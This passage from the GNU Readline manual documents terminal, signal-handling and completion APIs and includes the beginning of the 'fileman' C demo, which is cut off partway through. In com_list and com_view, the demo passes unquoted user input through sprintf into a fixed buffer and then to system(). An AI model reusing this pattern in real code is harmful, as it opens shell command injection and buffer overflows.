to read characters from the terminal with rl_read_key(). Up to 512 characters may
be pushed back. rl_stuff_char returns 1 if the character was successfully inserted;
0 otherwise.
[Function]
int rl_execute_next (int c)
Make c be the next command to be executed when rl_read_key() is called. This
sets rl_pending_input.
[Function]
int rl_clear_pending_input (void)
Unset rl_pending_input, effectively negating the effect of any previous call to rl_
execute_next(). This works only if the pending input has not already been read
with rl_read_key().
[Function]
int rl_set_keyboard_input_timeout (int u)
While waiting for keyboard input in rl_read_key(), Readline will wait for u mi-
croseconds for input before calling any function assigned to rl_event_hook. u must
be greater than or equal to zero (a zero-length timeout is equivalent to a poll). The
default waiting period is one-tenth of a second. Returns the old timeout value.
2.4.9 Terminal Management
[Function]
void rl_prep_terminal (int meta_flag)
Modify the terminal settings for Readline’s use, so readline() can read a single
character at a time from the keyboard. The meta_flag argument should be non-zero
if Readline should read eight-bit input.
[Function]
void rl_deprep_terminal (void)
Undo the effects of rl_prep_terminal(), leaving the terminal in the state in which
it was before the most recent call to rl_prep_terminal().
[Function]
void rl_tty_set_default_bindings (Keymap kmap)
Bind the operating system’s terminal editing characters (as would be displayed by stty) to their Readline equivalents. The bindings are performed in kmap.
[Function]
void rl_tty_unset_default_bindings (Keymap kmap)
Reset the bindings manipulated by rl_tty_set_default_bindings so that the ter-
minal editing characters are bound to rl_insert. The bindings are performed in
kmap.
[Function]
int rl_reset_terminal (const char *terminal_name)
Reinitialize Readline’s idea of the terminal settings using terminal_name as the terminal type (e.g., vt100). If terminal_name is NULL, the value of the TERM environment variable is used.
2.4.10 Utility Functions
[Function]
int rl_save_state (struct readline_state *sp)
Save a snapshot of Readline’s internal state to sp. The contents of the readline_state structure are documented in ‘readline.h’. The caller is responsible for allocating the structure.
[Function]
int rl_restore_state (struct readline_state *sp)
Restore Readline’s internal state to that stored in sp, which must have been saved by a call to rl_save_state. The contents of the readline_state structure are documented in ‘readline.h’. The caller is responsible for freeing the structure.
[Function]
void rl_free (void *mem)
Deallocate the memory pointed to by mem. mem must have been allocated by malloc.
[Function]
void rl_replace_line (const char *text, int clear_undo)
Replace the contents of rl_line_buffer with text. The point and mark are preserved, if possible. If clear_undo is non-zero, the undo list associated with the current line is cleared.
[Function]
void rl_extend_line_buffer (int len)
Ensure that rl_line_buffer has enough space to hold len characters, possibly real-
locating it if necessary.
[Function]
int rl_initialize (void)
Initialize or re-initialize Readline’s internal state. It’s not strictly necessary to call
this; readline() calls it before reading any input.
[Function]
int rl_ding (void)
Ring the terminal bell, obeying the setting of bell-style.
[Function]
int rl_alphabetic (int c)
Return 1 if c is an alphabetic character.
[Function]
void rl_display_match_list (char **matches, int len, int max)
A convenience function for displaying a list of strings in columnar format on Read-
line’s output stream. matches is the list of strings, in argv format, such as a list of
completion matches. len is the number of strings in matches, and max is the length of
the longest string in matches. This function uses the setting of print-completions-
horizontally to select how the matches are displayed (see Section 1.3.1 [Readline
Init File Syntax], page 4).
The following are implemented as macros, defined in chardefs.h. Applications should
refrain from using them.
[Function]
int _rl_uppercase_p (int c)
Return 1 if c is an uppercase alphabetic character.
[Function]
int _rl_lowercase_p (int c)
Return 1 if c is a lowercase alphabetic character.
[Function]
int _rl_digit_p (int c)
Return 1 if c is a numeric character.
[Function]
int _rl_to_upper (int c)
If c is a lowercase alphabetic character, return the corresponding uppercase character.
[Function]
int _rl_to_lower (int c)
If c is an uppercase alphabetic character, return the corresponding lowercase charac-
ter.
[Function]
int _rl_digit_value (int c)
If c is a number, return the value it represents.
2.4.11 Miscellaneous Functions
[Function]
int rl_macro_bind (const char *keyseq, const char *macro, Keymap map)
Bind the key sequence keyseq to invoke the macro macro. The binding is performed in
map. When keyseq is invoked, the macro will be inserted into the line. This function
is deprecated; use rl_generic_bind() instead.
[Function]
void rl_macro_dumper (int readable)
Print the key sequences bound to macros and their values, using the current keymap,
to rl_outstream. If readable is non-zero, the list is formatted in such a way that it
can be made part of an inputrc file and re-read.
[Function]
int rl_variable_bind (const char *variable, const char *value)
Make the Readline variable variable have value. This behaves as if the readline com-
mand ‘set variable value’ had been executed in an inputrc file (see Section 1.3.1
[Readline Init File Syntax], page 4).
[Function]
char * rl_variable_value (const char *variable)
Return a string representing the value of the Readline variable variable. For boolean
variables, this string is either ‘on’ or ‘off’.
[Function]
void rl_variable_dumper (int readable)
Print the readline variable names and their current values to rl_outstream. If
readable is non-zero, the list is formatted in such a way that it can be made part of
an inputrc file and re-read.
[Function]
int rl_set_paren_blink_timeout (int u)
Set the time interval (in microseconds) that Readline waits when showing a balancing
character when blink-matching-paren has been enabled.
[Function]
char * rl_get_termcap (const char *cap)
Retrieve the string value of the termcap capability cap. Readline fetches the termcap
entry for the current terminal name and uses those capabilities to move around the
screen line and perform other terminal-specific operations, like erasing a line. Readline
does not use all of a terminal’s capabilities, and this function will return values for
only those capabilities Readline uses.
2.4.12 Alternate Interface
An alternate interface is available to plain readline(). Some applications need to interleave
keyboard I/O with file, device, or window system I/O, typically by using a main loop to
select() on various file descriptors. To accommodate this need, readline can also be invoked
as a ‘callback’ function from an event loop. There are functions available to make this easy.
[Function]
void rl_callback_handler_install (const char *prompt, rl_vcpfunc_t *lhandler)
Set up the terminal for readline I/O and display the initial expanded value of prompt.
Save the value of lhandler to use as a function to call when a complete line of input
has been entered. The function takes the text of the line as an argument.
[Function]
void rl_callback_read_char (void)
Whenever an application determines that keyboard input is available, it should call
rl_callback_read_char(), which will read the next character from the current input
source.
If that character completes the line, rl_callback_read_char will invoke
the lhandler function saved by rl_callback_handler_install to process the line.
Before calling the lhandler function, the terminal settings are reset to the values they
had before calling rl_callback_handler_install. If the lhandler function returns,
the terminal settings are modified for Readline’s use again. EOF is indicated by calling
lhandler with a NULL line.
[Function]
void rl_callback_handler_remove (void)
Restore the terminal to its initial state and remove the line handler. This may be
called from within a callback as well as independently. If the lhandler installed by
rl_callback_handler_install does not exit the program, either this function or
the function referred to by the value of rl_deprep_term_function should be called
before the program exits to reset the terminal settings.
2.4.13 A Readline Example
Here is a function which changes lowercase characters to their uppercase equivalents, and
uppercase characters to lowercase. If this function was bound to ‘M-c’, then typing ‘M-c’
would change the case of the character under point. Typing ‘M-1 0 M-c’ would change the
case of the following 10 characters, leaving the cursor on the last character changed.
/* Invert the case of the COUNT following characters. */
int
invert_case_line (count, key)
     int count, key;
{
  register int direction, start, end, i;

  start = rl_point;

  if (rl_point >= rl_end)
    return (0);

  if (count < 0)
    {
      direction = -1;
      count = -count;
    }
  else
    direction = 1;

  /* Find the end of the range to modify. */
  end = start + (count * direction);

  /* Force it to be within range. */
  if (end > rl_end)
    end = rl_end;
  else if (end < 0)
    end = 0;

  if (start == end)
    return (0);

  if (start > end)
    {
      int temp = start;
      start = end;
      end = temp;
    }

  /* Tell readline that we are modifying the line,
     so it will save the undo information. */
  rl_modifying (start, end);

  for (i = start; i != end; i++)
    {
      if (_rl_uppercase_p (rl_line_buffer[i]))
        rl_line_buffer[i] = _rl_to_lower (rl_line_buffer[i]);
      else if (_rl_lowercase_p (rl_line_buffer[i]))
        rl_line_buffer[i] = _rl_to_upper (rl_line_buffer[i]);
    }

  /* Move point to on top of the last character changed. */
  rl_point = (direction == 1) ? end - 1 : start;
  return (0);
}
2.5 Readline Signal Handling
Signals are asynchronous events sent to a process by the Unix kernel, sometimes on behalf
of another process. They are intended to indicate exceptional events, like a user pressing
the interrupt key on his terminal, or a network connection being broken. There is a class
of signals that can be sent to the process currently reading input from the keyboard. Since
Readline changes the terminal attributes when it is called, it needs to perform special
processing when such a signal is received in order to restore the terminal to a sane state, or
provide application writers with functions to do so manually.
Readline contains an internal signal handler that is installed for a number of signals
(SIGINT, SIGQUIT, SIGTERM, SIGALRM, SIGTSTP, SIGTTIN, and SIGTTOU).
When one of
these signals is received, the signal handler will reset the terminal attributes to those that
were in effect before readline() was called, reset the signal handling to what it was before
readline() was called, and resend the signal to the calling application.
If and when
the calling application’s signal handler returns, Readline will reinitialize the terminal and
continue to accept input. When a SIGINT is received, the Readline signal handler performs
some additional work, which will cause any partially-entered line to be aborted (see the
description of rl_free_line_state() below).
There is an additional Readline signal handler, for SIGWINCH, which the kernel sends to a
process whenever the terminal’s size changes (for example, if a user resizes an xterm). The
Readline SIGWINCH handler updates Readline’s internal screen size information, and then
calls any SIGWINCH signal handler the calling application has installed. Readline calls the
application’s SIGWINCH signal handler without resetting the terminal to its original state.
If the application’s signal handler does more than update its idea of the terminal size and
return (for example, a longjmp back to a main processing loop), it must call rl_cleanup_
after_signal() (described below), to restore the terminal state.
Readline provides two variables that allow application writers to control whether or not
it will catch certain signals and act on them when they are received. It is important that
applications change the values of these variables only when calling readline(), not in a
signal handler, so Readline’s internal signal state is not corrupted.
[Variable]
int rl_catch_signals
If this variable is non-zero, Readline will install signal handlers for SIGINT, SIGQUIT,
SIGTERM, SIGALRM, SIGTSTP, SIGTTIN, and SIGTTOU.
The default value of rl_catch_signals is 1.
[Variable]
int rl_catch_sigwinch
If this variable is non-zero, Readline will install a signal handler for SIGWINCH.
The default value of rl_catch_sigwinch is 1.
If an application does not wish to have Readline catch any signals, or to handle signals
other than those Readline catches (SIGHUP, for example), Readline provides convenience
functions to do the necessary terminal and internal state cleanup upon receipt of a signal.
[Function]
void rl_cleanup_after_signal (void)
This function will reset the state of the terminal to what it was before readline()
was called, and remove the Readline signal handlers for all signals, depending on the
values of rl_catch_signals and rl_catch_sigwinch.
[Function]
void rl_free_line_state (void)
This will free any partial state associated with the current input line (undo infor-
mation, any partial history entry, any partially-entered keyboard macro, and any
partially-entered numeric argument). This should be called before
rl_cleanup_after_signal(). The Readline signal handler for SIGINT calls this to
abort the current input line.
[Function]
void rl_reset_after_signal (void)
This will reinitialize the terminal and reinstall any Readline signal handlers, depend-
ing on the values of rl_catch_signals and rl_catch_sigwinch.
If an application does not wish Readline to catch SIGWINCH, it may call
rl_resize_terminal() or rl_set_screen_size() to force Readline to update its idea
of the terminal size when a SIGWINCH is received.
[Function]
void rl_echo_signal_char (int sig)
If an application wishes to install its own signal handlers, but still have readline
display characters that generate signals, calling this function with sig set to SIGINT,
SIGQUIT, or SIGTSTP will display the character generating that signal.
[Function]
void rl_resize_terminal (void)
Update Readline’s internal screen size by reading values from the kernel.
[Function]
void rl_set_screen_size (int rows, int cols)
Set Readline's idea of the terminal size to rows rows and cols columns. If either rows
or cols is less than or equal to 0, Readline's idea of that terminal dimension is
unchanged.
If an application does not want to install a SIGWINCH handler, but is still interested in
the screen dimensions, Readline’s idea of the screen size may be queried.
[Function]
void rl_get_screen_size (int *rows, int *cols)
Return Readline’s idea of the terminal’s size in the variables pointed to by the argu-
ments.
[Function]
void rl_reset_screen_size (void)
Cause Readline to reobtain the screen size and recalculate its dimensions.
The following functions install and remove Readline’s signal handlers.
[Function]
int rl_set_signals (void)
Install Readline’s signal handler for SIGINT, SIGQUIT, SIGTERM, SIGALRM, SIGTSTP,
SIGTTIN, SIGTTOU, and SIGWINCH, depending on the values of rl_catch_signals and
rl_catch_sigwinch.
[Function]
int rl_clear_signals (void)
Remove all of the Readline signal handlers installed by rl_set_signals().
2.6 Custom Completers
Typically, a program that reads commands from the user has a way of disambiguating
commands and data. If your program is one of these, then it can provide completion for
commands, data, or both. The following sections describe how your program and Readline
cooperate to provide this service.
2.6.1 How Completing Works
In order to complete some text, the full list of possible completions must be available. That
is, it is not possible to accurately expand a partial word without knowing all of the possible
words which make sense in that context. The Readline library provides the user interface
to completion, and two of the most common completion functions: filename and username.
For completing other types of text, you must write your own completion function. This
section describes exactly what such functions must do, and provides an example.
There are three major functions used to perform completion:
1. The user-interface function rl_complete().
This function is called with the same
arguments as other bindable Readline functions: count and invoking key. It isolates
the word to be completed and calls rl_completion_matches() to generate a list of
possible completions. It then either lists the possible completions, inserts the possible
completions, or actually performs the completion, depending on which behavior is
desired.
2. The internal function rl_completion_matches() uses an application-supplied gener-
ator function to generate the list of possible matches, and then returns the array of
these matches. The caller should place the address of its generator function in rl_
completion_entry_function.
3. The generator function is called repeatedly from rl_completion_matches(), returning
a string each time. The arguments to the generator function are text and state. text
is the partial word to be completed. state is zero the first time the function is called,
allowing the generator to perform any necessary initialization, and a positive non-
zero integer for each subsequent call. The generator function returns (char *)NULL to
inform rl_completion_matches() that there are no more possibilities left. Usually
the generator function computes the list of possible completions when state is zero,
and returns them one at a time on subsequent calls. Each string the generator function
returns as a match must be allocated with malloc(); Readline frees the strings when
it has finished with them. Such a generator function is referred to as an application-
specific completion function.
[Function]
int rl_complete (int ignore, int invoking_key)
Complete the word at or before point. You have supplied the function that does the
initial simple matching selection algorithm (see rl_completion_matches()). The
default is to do filename completion.
[Variable]
rl_compentry_func_t * rl_completion_entry_function
This is a pointer to the generator function for rl_completion_matches(). If the
value of rl_completion_entry_function is NULL then the default filename generator
function, rl_filename_completion_function(), is used.
An application-specific
completion function is a function whose address is assigned to rl_completion_entry_
function and whose return values are used to generate possible completions.
2.6.2 Completion Functions
Here is the complete list of callable completion functions present in Readline.
[Function]
int rl_complete_internal (int what_to_do)
Complete the word at or before point. what_to_do says what to do with the
completion. A value of ‘?’ means list the possible completions. ‘TAB’ means do standard
completion. ‘*’ means insert all of the possible completions. ‘!’ means to display all
of the possible completions, if there is more than one, as well as performing partial
completion. ‘@’ is similar to ‘!’, but possible completions are not listed if the possible
completions share a common prefix.
[Function]
int rl_complete (int ignore, int invoking_key)
Complete the word at or before point. You have supplied the function that does
the initial simple matching selection algorithm (see rl_completion_matches() and
rl_completion_entry_function). The default is to do filename completion. This
calls rl_complete_internal() with an argument depending on invoking_key.
[Function]
int rl_possible_completions (int count, int invoking_key)
List the possible completions. See description of rl_complete (). This calls rl_
complete_internal() with an argument of ‘?’.
[Function]
int rl_insert_completions (int count, int invoking_key)
Insert the list of possible completions into the line, deleting the partially-completed
word. See description of rl_complete(). This calls rl_complete_internal() with
an argument of ‘*’.
[Function]
int rl_completion_mode (rl_command_func_t *cfunc)
Returns the appropriate value to pass to rl_complete_internal() depending on
whether cfunc was called twice in succession and the values of the show-all-if-
ambiguous and show-all-if-unmodified variables. Application-specific completion
functions may use this function to present the same interface as rl_complete().
[Function]
char ** rl_completion_matches (const char *text, rl_compentry_func_t *entry_func)
Returns an array of strings which is a list of completions for text. If there are no
completions, returns NULL. The first entry in the returned array is the substitution
for text. The remaining entries are the possible completions. The array is terminated
with a NULL pointer.
entry_func is a function of two args, and returns a char *. The first argument is
text. The second is a state argument; it is zero on the first call, and non-zero on
subsequent calls. entry_func returns a NULL pointer to the caller when there are no
more matches.
[Function]
char * rl_filename_completion_function (const char *text, int state)
A generator function for filename completion in the general case. text is a partial file-
name. The Bash source is a useful reference for writing application-specific completion
functions (the Bash completion functions call this and other Readline functions).
[Function]
char * rl_username_completion_function (const char *text, int state)
A completion generator for usernames. text contains a partial username preceded by
a random character (usually ‘~’). As with all completion generators, state is zero on
the first call and non-zero for subsequent calls.
2.6.3 Completion Variables
[Variable]
rl_compentry_func_t * rl_completion_entry_function
A pointer to the generator function for rl_completion_matches(). NULL means to
use rl_filename_completion_function(), the default filename completer.
[Variable]
rl_completion_func_t * rl_attempted_completion_function
A pointer to an alternative function to create matches. The function is called with
text, start, and end.
start and end are indices in rl_line_buffer defining the
boundaries of text, which is a character string. If this function exists and returns
NULL, or if this variable is set to NULL, then rl_complete() will call the value of
rl_completion_entry_function to generate matches, otherwise the array of strings
returned will be used.
If this function sets the rl_attempted_completion_over
variable to a non-zero value, Readline will not perform its default completion even if
this function returns no matches.
[Variable]
rl_quote_func_t * rl_filename_quoting_function
A pointer to a function that will quote a filename in an application-specific fashion.
This is called if filename completion is being attempted and one of the characters
in rl_filename_quote_characters appears in a completed filename. The function
is called with text, match_type, and quote_pointer. The text is the filename to be
quoted. The match_type is either SINGLE_MATCH, if there is only one completion
match, or MULT_MATCH. Some functions use this to decide whether or not to insert a
closing quote character. The quote_pointer is a pointer to any opening quote character
the user typed. Some functions choose to reset this character.
[Variable]
rl_dequote_func_t * rl_filename_dequoting_function
A pointer to a function that will remove application-specific quoting characters from
a filename before completion is attempted, so those characters do not interfere with
matching the text against names in the filesystem. It is called with text, the text
of the word to be dequoted, and quote_char, which is the quoting character that
delimits the filename (usually ‘'’ or ‘"’). If quote_char is zero, the filename was not
in an embedded string.
[Variable]
rl_linebuf_func_t * rl_char_is_quoted_p
A pointer to a function to call that determines whether or not a specific character
in the line buffer is quoted, according to whatever quoting mechanism the program
calling Readline uses. The function is called with two arguments: text, the text of the
line, and index, the index of the character in the line. It is used to decide whether a
character found in rl_completer_word_break_characters should be used to break
words for the completer.
[Variable]
rl_compignore_func_t * rl_ignore_some_completions_function
This function, if defined, is called by the completer when real filename completion
is done, after all the matching names have been generated. It is passed a NULL ter-
minated array of matches. The first element (matches[0]) is the maximal substring
common to all matches. This function can re-arrange the list of matches as required,
but each element deleted from the array must be freed.
[Variable]
rl_icppfunc_t * rl_directory_completion_hook
This function, if defined, is allowed to modify the directory portion of filenames
Readline completes. It is called with the address of a string (the current directory
name) as an argument, and may modify that string. If the string is replaced with
a new string, the old value should be freed. Any modified directory name should
have a trailing slash. The modified value will be displayed as part of the completion,
replacing the directory portion of the pathname the user typed. It returns an integer
that should be non-zero if the function modifies its directory argument. It could be
used to expand symbolic links or shell variables in pathnames. At the least, even if
no other expansion is performed, this function should remove any quote characters
from the directory name, because its result will be passed directly to opendir().
[Variable]
rl_dequote_func_t * rl_filename_rewrite_hook
If non-zero, this is the address of a function called when reading directory entries from
the filesystem for completion and comparing them to the partial word to be completed.
The function should perform any necessary application or system-specific conversion on
the filename, such as converting between character sets or converting from a filesystem
format to a character input format. The function takes two arguments: fname, the
filename to be converted, and fnlen, its length in bytes. It must either return its first
argument (if no conversion takes place) or the converted filename in newly-allocated
memory. The converted form is used to compare against the word to be completed,
and, if it matches, is added to the list of matches. Readline will free the allocated
string.
[Variable]
rl_compdisp_func_t * rl_completion_display_matches_hook
If non-zero, then this is the address of a function to call when completing a word would
normally display the list of possible matches. This function is called in lieu of Readline
displaying the list. It takes three arguments: (char **matches, int num_matches,
int max_length) where matches is the array of matching strings, num_matches is the
number of strings in that array, and max_length is the length of the longest string in
that array. Readline provides a convenience function, rl_display_match_list, that
takes care of doing the display to Readline’s output stream. That function may be
called from this hook.
[Variable]
const char * rl_basic_word_break_characters
The basic list of characters that signal a break between words for the completer
routine. The default value of this variable is the characters which break words for
completion in Bash: " \t\n\"\\'`@$><=;|&{(".
[Variable]
const char * rl_basic_quote_characters
A list of quote characters which can cause a word break.
[Variable]
const char * rl_completer_word_break_characters
The list of characters that signal a break between words for rl_complete_
internal(). The default list is the value of rl_basic_word_break_characters.
[Variable]
rl_cpvfunc_t * rl_completion_word_break_hook
If non-zero, this is the address of a function to call when Readline is deciding where
to separate words for word completion. It should return a character string like rl_
completer_word_break_characters to be used to perform the current completion.
The function may choose to set rl_completer_word_break_characters itself. If the
function returns NULL, rl_completer_word_break_characters is used.
[Variable]
const char * rl_completer_quote_characters
A list of characters which can be used to quote a substring of the line. Completion
occurs on the entire substring, and within the substring rl_completer_word_break_
characters are treated as any other character, unless they also appear within this
list.
[Variable]
const char * rl_filename_quote_characters
A list of characters that cause a filename to be quoted by the completer when they
appear in a completed filename. The default is the null string.
[Variable]
const char * rl_special_prefixes
The list of characters that are word break characters, but should be left in text when
it is passed to the completion function. Programs can use this to help determine what
kind of completing to do. For instance, Bash sets this variable to "$@" so that it can
complete shell variables and hostnames.
[Variable]
int rl_completion_query_items
Up to this many items will be displayed in response to a possible-completions call.
After that, readline asks the user if she is sure she wants to see them all. The default
value is 100. A negative value indicates that Readline should never ask the user.
[Variable]
int rl_completion_append_character
When a single completion alternative matches at the end of the command line, this
character is appended to the inserted completion text. The default is a space character
(‘ ’).
Setting this to the null character (‘\0’) prevents anything being appended
automatically. This can be changed in application-specific completion functions to
provide the “most sensible word separator character” according to an application-
specific command line syntax specification.
[Variable]
int rl_completion_suppress_append
If non-zero, rl_completion_append_character is not appended to matches at the end
of the command line, as described above. It is set to 0 before any application-specific
completion function is called, and may only be changed within such a function.
[Variable]
int rl_completion_quote_character
When Readline is completing quoted text, as delimited by one of the characters in
rl_completer_quote_characters, it sets this variable to the quoting character found.
This is set before any application-specific completion function is called.
[Variable]
int rl_completion_suppress_quote
If non-zero, Readline does not append a matching quote character when performing
completion on a quoted string. It is set to 0 before any application-specific completion
function is called, and may only be changed within such a function.
[Variable]
int rl_completion_found_quote
When Readline is completing quoted text, it sets this variable to a non-zero value if
the word being completed contains or is delimited by any quoting characters, including
backslashes. This is set before any application-specific completion function is called.
[Variable]
int rl_completion_mark_symlink_dirs
If non-zero, a slash will be appended to completed filenames that are symbolic links
to directory names, subject to the value of the user-settable mark-directories variable.
This variable exists so that application-specific completion functions can override the
user’s global preference (set via the mark-symlinked-directories Readline variable)
if appropriate. This variable is set to the user’s preference before any application-
specific completion function is called, so unless that function modifies the value, the
user’s preferences are honored.
[Variable]
int rl_ignore_completion_duplicates
If non-zero, then duplicates in the matches are removed. The default is 1.
[Variable]
int rl_filename_completion_desired
Non-zero means that the results of the matches are to be treated as filenames. This
is always zero when completion is attempted, and can only be changed within an
application-specific completion function. If it is set to a non-zero value by such a
function, directory names have a slash appended and Readline attempts to quote com-
pleted filenames if they contain any characters in rl_filename_quote_characters
and rl_filename_quoting_desired is set to a non-zero value.
[Variable]
int rl_filename_quoting_desired
Non-zero means that the results of the matches are to be quoted using double quotes
(or an application-specific quoting mechanism) if the completed filename contains
any characters in rl_filename_quote_characters. This is always non-zero when
completion is attempted, and can only be changed within an application-specific completion
function. The quoting is effected via a call to the function pointed to by rl_filename_
quoting_function.
[Variable]
int rl_attempted_completion_over
If an application-specific completion function assigned to rl_attempted_
completion_function sets this variable to a non-zero value, Readline will not
perform its default filename completion even if the application's completion function
returns no matches. It should be set only by an application's completion function.
[Variable]
int rl_sort_completion_matches
If an application sets this variable to 0, Readline will not sort the list of completions
(which implies that it cannot remove any duplicate completions). The default value is
1, which means that Readline will sort the completions and, depending on the value
of rl_ignore_completion_duplicates, will attempt to remove duplicate matches.
[Variable]
int rl_completion_type
Set to a character describing the type of completion Readline is currently attempt-
ing; see the description of rl_complete_internal() (see Section 2.6.2 [Completion
Functions], page 42) for the list of characters. This is set to the appropriate value
before any application-specific completion function is called, allowing such functions
to present the same interface as rl_complete().
[Variable]
int rl_completion_invoking_key
Set to the final character in the key sequence that invoked one of the completion
functions that call rl_complete_internal(). This is set to the appropriate value
before any application-specific completion function is called.
[Variable]
int rl_inhibit_completion
If this variable is non-zero, completion is inhibited. The completion character will be
inserted as any other bound to self-insert.
2.6.4 A Short Completion Example
Here is a small application demonstrating the use of the GNU Readline library. It is called
fileman, and the source code resides in ‘examples/fileman.c’. This sample application
provides completion of command names, line editing features, and access to the history list.
/* fileman.c -- A tiny application which demonstrates how to use the
   GNU Readline library.  This application interactively allows users
   to manipulate files and their modes. */

#ifdef HAVE_CONFIG_H
#  include <config.h>
#endif

#include <sys/types.h>
#ifdef HAVE_SYS_FILE_H
#  include <sys/file.h>
#endif
#include <sys/stat.h>

#ifdef HAVE_UNISTD_H
#  include <unistd.h>
#endif

#include <fcntl.h>
#include <stdio.h>
#include <errno.h>

#if defined (HAVE_STRING_H)
#  include <string.h>
#else /* !HAVE_STRING_H */
#  include <strings.h>
#endif /* !HAVE_STRING_H */

#ifdef HAVE_STDLIB_H
#  include <stdlib.h>
#endif

#include <time.h>

#include <readline/readline.h>
#include <readline/history.h>

extern char *xmalloc PARAMS((size_t));

/* The names of functions that actually do the manipulation. */
int com_list PARAMS((char *));
int com_view PARAMS((char *));
int com_rename PARAMS((char *));
int com_stat PARAMS((char *));
int com_pwd PARAMS((char *));
int com_delete PARAMS((char *));
int com_help PARAMS((char *));
int com_cd PARAMS((char *));
int com_quit PARAMS((char *));

/* A structure which contains information on the commands this program
   can understand. */

typedef struct {
  char *name;           /* User printable name of the function. */
  rl_icpfunc_t *func;   /* Function to call to do the job. */
  char *doc;            /* Documentation for this function. */
} COMMAND;
COMMAND commands[] = {
{ "cd", com_cd, "Change to directory DIR" },
{ "delete", com_delete, "Delete FILE" },
{ "help", com_help, "Display this text" },
{ "?", com_help, "Synonym for `help'" },
{ "list", com_list, "List files in DIR" },
{ "ls", com_list, "Synonym for ‘list’" },
{ "pwd", com_pwd, "Print the current working directory" },
{ "quit", com_quit, "Quit using Fileman" },
{ "rename", com_rename, "Rename FILE to NEWNAME" },
{ "stat", com_stat, "Print out statistics on FILE" },
{ "view", com_view, "View the contents of FILE" },
{ (char *)NULL, (rl_icpfunc_t *)NULL, (char *)NULL }
};
/* Forward declarations. */
char *stripwhite ();
COMMAND *find_command ();
/* The name of this program, as taken from argv[0]. */
char *progname;
/* When non-zero, this global means the user is done using this program. */
int done;
char *
dupstr (s)
char *s;
{
char *r;
r = xmalloc (strlen (s) + 1);
strcpy (r, s);
return (r);
}
main (argc, argv)
int argc;
char **argv;
{
char *line, *s;
progname = argv[0];
initialize_readline (); /* Bind our completer. */
/* Loop reading and executing lines until the user quits. */
for ( ; done == 0; )
{
line = readline ("FileMan: ");
if (!line)
break;
/* Remove leading and trailing whitespace from the line.
Then, if there is anything left, add it to the history list
and execute it. */
s = stripwhite (line);
if (*s)
{
add_history (s);
execute_line (s);
}
free (line);
}
exit (0);
}
/* Execute a command line. */
int
execute_line (line)
char *line;
{
register int i;
COMMAND *command;
char *word;
/* Isolate the command word. */
i = 0;
while (line[i] && whitespace (line[i]))
i++;
word = line + i;
while (line[i] && !whitespace (line[i]))
i++;
if (line[i])
line[i++] = '\0';
command = find_command (word);
if (!command)
{
fprintf (stderr, "%s: No such command for FileMan.\n", word);
return (-1);
}
/* Get argument to command, if any. */
while (whitespace (line[i]))
i++;
word = line + i;
/* Call the function. */
return ((*(command->func)) (word));
}
/* Look up NAME as the name of a command, and return a pointer to that
command.
Return a NULL pointer if NAME isn’t a command name. */
COMMAND *
find_command (name)
char *name;
{
register int i;
for (i = 0; commands[i].name; i++)
if (strcmp (name, commands[i].name) == 0)
return (&commands[i]);
return ((COMMAND *)NULL);
}
/* Strip whitespace from the start and end of STRING.  Return a pointer
   into STRING. */
char *
stripwhite (string)
char *string;
{
register char *s, *t;
for (s = string; whitespace (*s); s++)
;
if (*s == 0)
return (s);
t = s + strlen (s) - 1;
while (t > s && whitespace (*t))
t--;
*++t = '\0';
return s;
}
/* **************************************************************** */
/*                                                                  */
/*                  Interface to Readline Completion                */
/*                                                                  */
/* **************************************************************** */
char *command_generator PARAMS((const char *, int));
char **fileman_completion PARAMS((const char *, int, int));
/* Tell the GNU Readline library how to complete.  We want to try to
   complete on command names if this is the first word in the line, or
   on filenames if not. */
initialize_readline ()
{
/* Allow conditional parsing of the ~/.inputrc file. */
rl_readline_name = "FileMan";
/* Tell the completer that we want a crack first. */
rl_attempted_completion_function = fileman_completion;
}
/* Attempt to complete on the contents of TEXT.  START and END bound the
   region of rl_line_buffer that contains the word to complete.  TEXT is
   the word to complete.  We can use the entire contents of rl_line_buffer
   in case we want to do some simple parsing.  Return the array of matches,
   or NULL if there aren't any. */
char **
fileman_completion (text, start, end)
const char *text;
int start, end;
{
char **matches;
matches = (char **)NULL;
/* If this word is at the start of the line, then it is a command
   to complete.  Otherwise it is the name of a file in the current
   directory. */
if (start == 0)
matches = rl_completion_matches (text, command_generator);
return (matches);
}
/* Generator function for command completion.  STATE lets us know whether
   to start from scratch; without any state (i.e. STATE == 0), then we
   start at the top of the list. */
char *
command_generator (text, state)
const char *text;
int state;
{
static int list_index, len;
char *name;
/* If this is a new word to complete, initialize now.  This includes
   saving the length of TEXT for efficiency, and initializing the index
   variable to 0. */
if (!state)
{
list_index = 0;
len = strlen (text);
}
/* Return the next name which partially matches from the command list. */
while (name = commands[list_index].name)
{
list_index++;
if (strncmp (name, text, len) == 0)
return (dupstr(name));
}
/* If no names matched, then return NULL. */
return ((char *)NULL);
}
/* **************************************************************** */
/*                                                                  */
/*                         FileMan Commands                         */
/*                                                                  */
/* **************************************************************** */
/* String to pass to system ().  This is for the LIST, VIEW and RENAME
   commands. */
static char syscom[1024];
/* List the file(s) named in arg. */
com_list (arg)
char *arg;
{
if (!arg)
arg = "";
sprintf (syscom, "ls -FClg %s", arg);
return (system (syscom));
}
com_view (arg)
char *arg;
{
if (!valid_argument ("view", arg))
return 1;
#if defined (__MSDOS__)
/* more.com doesn't grok slashes in pathnames */
sprintf (syscom, "less %s", arg);
#else
sprintf (syscom, "more %s", arg);
#endif
return (system (syscom));
}
com_rename (arg)
char *arg;
{
too_dangerous ("rename");
return (1);
}
com_stat (arg)
char *arg;
{
struct stat finfo;
if (!valid_argument ("stat", arg))
return (1);
if (stat (arg, &finfo) == -1)
{
perror (arg);
return (1);
}
printf ("Statistics for `%s':\n", arg);
printf ("%s has %d link%s, and is %d byte%s in length.\n",
arg,
finfo.st_nlink,
(finfo.st_nlink == 1) ? "" : "s",
finfo.st_size,
(finfo.st_size == 1) ? "" : "s");
printf ("Inode Last Change at: %s", ctime (&finfo.st_ctime));
printf ("      Last access at: %s", ctime (&finfo.st_atime));
printf ("    Last modified at: %s", ctime (&finfo.st_mtime));
return (0);
}
com_delete (arg)
char *arg;
{
too_dangerous ("delete");
return (1);
}
/* Print out help for ARG, or for all of the commands if ARG is
not present. */
com_help (arg)
char *arg;
{
register int i;
int printed = 0;
for (i = 0; commands[i].name; i++)
{
if (!*arg || (strcmp (arg, commands[i].name) == 0))
{
printf ("%s\t\t%s.\n", commands[i].name, commands[i].doc);
printed++;
}
}
if (!printed)
{
printf ("No commands match `%s'.  Possibilities are:\n", arg);
for (i = 0; commands[i].name; i++)
{
/* Print in six columns. */
if (printed == 6)
{
printed = 0;
printf ("\n");
}
printf ("%s\t", commands[i].name);
printed++;
}
